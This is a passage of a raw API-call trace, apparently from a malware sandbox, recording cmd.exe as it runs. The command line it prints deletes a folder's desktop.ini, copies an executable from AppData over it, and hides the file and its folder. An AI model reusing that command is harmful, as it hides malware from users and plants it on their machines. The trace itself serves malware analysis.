0x1c [0227.120] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f914, dwLength=0x1c | out: lpBuffer=0x26f914*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0227.120] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f914, dwLength=0x1c | out: lpBuffer=0x26f914*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0227.120] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f914, dwLength=0x1c | out: lpBuffer=0x26f914*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0227.120] GetConsoleOutputCP () returned 0x1b5 [0227.120] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0227.120] SetConsoleCtrlHandler (HandlerRoutine=0x4a4ee72a, Add=1) returned 1 [0227.121] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.121] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0227.121] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.121] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4f41ac | out: lpMode=0x4a4f41ac) returned 1 [0227.121] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.121] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0227.121] _get_osfhandle (_FileHandle=0) returned 0x3 [0227.121] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4f41b0 | out: lpMode=0x4a4f41b0) returned 1 [0227.121] _get_osfhandle (_FileHandle=0) returned 0x3 [0227.121] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0227.121] GetEnvironmentStringsW () returned 0x2e04d8* [0227.122] FreeEnvironmentStringsW (penv=0x2e04d8) returned 1 [0227.122] GetEnvironmentStringsW () returned 0x2e04d8* [0227.122] FreeEnvironmentStringsW (penv=0x2e04d8) returned 1 [0227.122] RegOpenKeyExW (in: hKey=0x80000002, 
lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e8b4 | out: phkResult=0x26e8b4*=0x40) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x0, lpData=0x26e8c0*=0x88, lpcbData=0x26e8b8*=0x1000) returned 0x2 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x4, lpData=0x26e8c0*=0x1, lpcbData=0x26e8b8*=0x4) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x0, lpData=0x26e8c0*=0x1, lpcbData=0x26e8b8*=0x1000) returned 0x2 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x4, lpData=0x26e8c0*=0x0, lpcbData=0x26e8b8*=0x4) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x4, lpData=0x26e8c0*=0x40, lpcbData=0x26e8b8*=0x4) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x4, lpData=0x26e8c0*=0x40, lpcbData=0x26e8b8*=0x4) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x0, lpData=0x26e8c0*=0x40, lpcbData=0x26e8b8*=0x1000) returned 0x2 [0227.122] RegCloseKey (hKey=0x40) returned 0x0 [0227.122] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, 
samDesired=0x2000000, phkResult=0x26e8b4 | out: phkResult=0x26e8b4*=0x40) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x0, lpData=0x26e8c0*=0x40, lpcbData=0x26e8b8*=0x1000) returned 0x2 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x4, lpData=0x26e8c0*=0x1, lpcbData=0x26e8b8*=0x4) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x0, lpData=0x26e8c0*=0x1, lpcbData=0x26e8b8*=0x1000) returned 0x2 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x4, lpData=0x26e8c0*=0x0, lpcbData=0x26e8b8*=0x4) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x4, lpData=0x26e8c0*=0x9, lpcbData=0x26e8b8*=0x4) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x4, lpData=0x26e8c0*=0x9, lpcbData=0x26e8b8*=0x4) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x0, lpData=0x26e8c0*=0x9, lpcbData=0x26e8b8*=0x1000) returned 0x2 [0227.123] RegCloseKey (hKey=0x40) returned 0x0 [0227.123] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bb [0227.123] srand (_Seed=0x5b8863bb) [0227.123] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C 
attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"" [0227.123] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"" [0227.123] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4f5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.123] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1c38, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0227.123] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0227.123] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0227.123] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0227.123] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0227.123] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0227.123] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") 
returned 13 [0227.123] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0227.123] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0227.123] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0227.124] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0227.124] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0227.124] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0227.124] GetEnvironmentStringsW () returned 0x2e2628* [0227.124] FreeEnvironmentStringsW (penv=0x2e2628) returned 1 [0227.124] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.124] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0227.124] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0227.124] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0227.124] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0227.124] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0227.124] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0227.124] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0227.124] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0227.124] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0227.124] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f680 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.124] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f680, lpFilePart=0x26f67c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f67c*="Desktop") returned 0x18 [0227.124] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0227.124] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f3fc 
| out: lpFindFileData=0x26f3fc) returned 0x2e0cb8 [0227.125] FindClose (in: hFindFile=0x2e0cb8 | out: hFindFile=0x2e0cb8) returned 1 [0227.125] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f3fc | out: lpFindFileData=0x26f3fc) returned 0x2e0cb8 [0227.125] FindClose (in: hFindFile=0x2e0cb8 | out: hFindFile=0x2e0cb8) returned 1 [0227.125] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f3fc | out: lpFindFileData=0x26f3fc) returned 0x2e0cb8 [0227.125] FindClose (in: hFindFile=0x2e0cb8 | out: hFindFile=0x2e0cb8) returned 1 [0227.125] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0227.125] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0227.125] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0227.125] GetEnvironmentStringsW () returned 0x2e04d8* [0227.125] FreeEnvironmentStringsW (penv=0x2e04d8) returned 1 [0227.125] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4f5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.126] GetConsoleOutputCP () returned 0x1b5 [0227.126] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0227.126] GetUserDefaultLCID () returned 0x409 [0227.126] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a4f4950, cchData=8 | out: lpLCData=":") returned 2 [0227.126] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f7c0, cchData=128 | out: lpLCData="0") returned 2 [0227.126] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f7c0, cchData=128 | out: lpLCData="0") returned 2 [0227.126] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f7c0, cchData=128 | out: lpLCData="1") returned 2 [0227.126] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a4f4940, cchData=8 | out: lpLCData="/") 
returned 2 [0227.126] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a4f4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0227.127] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a4f4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0227.127] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a4f4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0227.127] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a4f4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0227.127] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a4f4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0227.127] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a4f4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0227.127] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a4f4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0227.127] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a4f4930, cchData=8 | out: lpLCData=".") returned 2 [0227.127] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a4f4920, cchData=8 | out: lpLCData=",") returned 2 [0227.127] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0227.128] GetConsoleTitleW (in: lpConsoleTitle=0x2d0af0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.128] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0227.128] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0227.128] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0227.128] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0227.129] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0227.129] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0227.129] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0227.129] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0227.129] 
_wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0227.129] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0227.129] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0227.131] _wcsicmp (_String1="del", _String2=")") returned 59 [0227.131] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0227.131] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0227.131] _wcsicmp (_String1="IF", _String2="del") returned 5 [0227.131] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0227.131] _wcsicmp (_String1="REM", _String2="del") returned 14 [0227.131] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0227.133] _wcsicmp (_String1="type", _String2=")") returned 75 [0227.133] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0227.133] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0227.133] _wcsicmp (_String1="IF", _String2="type") returned -11 [0227.133] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0227.133] _wcsicmp (_String1="REM", _String2="type") returned -2 [0227.133] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0227.264] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0227.264] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0227.277] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0227.278] FindClose (in: hFindFile=0x2e25c8 | out: hFindFile=0x2e25c8) returned 1 [0227.279] FindClose (in: hFindFile=0x2e25c8 | out: hFindFile=0x2e25c8) returned 1 [0227.279] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0227.279] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0227.279] GetConsoleTitleW (in: lpConsoleTitle=0x26f1e8, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.279] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f070, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f138 | out: lpAttributeList=0x26f070, lpSize=0x26f138) returned 1 [0227.279] UpdateProcThreadAttribute (in: lpAttributeList=0x26f070, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f130, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f070, lpPreviousValue=0x0) returned 1 [0227.279] GetStartupInfoW (in: lpStartupInfo=0x26f02c | out: lpStartupInfo=0x26f02c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0227.279] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0227.280] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26f0cc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f118 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" ", lpProcessInformation=0x26f118*(hProcess=0x50, hThread=0x4c, dwProcessId=0xf28, dwThreadId=0xf4c)) returned 1 [0227.284] CloseHandle (hObject=0x4c) returned 1 
[0227.284] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0227.284] GetEnvironmentStringsW () returned 0x2e0a08* [0227.284] FreeEnvironmentStringsW (penv=0x2e0a08) returned 1 [0227.284] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0227.659] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26f00c | out: lpExitCode=0x26f00c*=0x0) returned 1 [0227.659] CloseHandle (hObject=0x50) returned 1 [0227.659] _vsnwprintf (in: _Buffer=0x26f154, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f018 | out: _Buffer="00000000") returned 8 [0227.660] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0227.660] GetEnvironmentStringsW () returned 0x2e2618* [0227.660] FreeEnvironmentStringsW (penv=0x2e2618) returned 1 [0227.660] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0227.660] GetEnvironmentStringsW () returned 0x2e2618* [0227.660] FreeEnvironmentStringsW (penv=0x2e2618) returned 1 [0227.660] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f070 | out: lpAttributeList=0x26f070) [0227.660] GetConsoleTitleW (in: lpConsoleTitle=0x26f3f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.661] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\desktop.ini")) returned 0xffffffff [0227.661] GetLastError () returned 0x2 [0227.661] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00")) returned 0x10 [0227.661] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0227.661] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0227.661] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\desktop.ini")) returned 0xffffffff [0227.661] GetLastError () 
returned 0x2 [0227.661] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x26ee9c | out: lpConsoleScreenBufferInfo=0x26ee9c) returned 1 [0227.662] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a504640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0227.663] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0227.663] GetConsoleTitleW (in: lpConsoleTitle=0x26f38c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.664] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0227.664] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.665] GetFileType (hFile=0x50) returned 0x1 [0227.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.665] GetFileType (hFile=0x50) returned 0x1 [0227.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.665] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] GetFileType (hFile=0x50) returned 0x1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] GetFileType (hFile=0x50) returned 0x1 
[0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] GetFileType (hFile=0x50) returned 0x1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] GetFileType (hFile=0x50) returned 0x1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] GetFileType (hFile=0x50) returned 0x1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.668] GetFileType (hFile=0x50) returned 0x1 [0227.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.668] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.668] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.668] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.668] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.668] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.668] GetFileType (hFile=0x50) returned 0x1 [0227.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.668] GetFileType (hFile=0x50) returned 0x1 [0227.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.668] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.668] _get_osfhandle 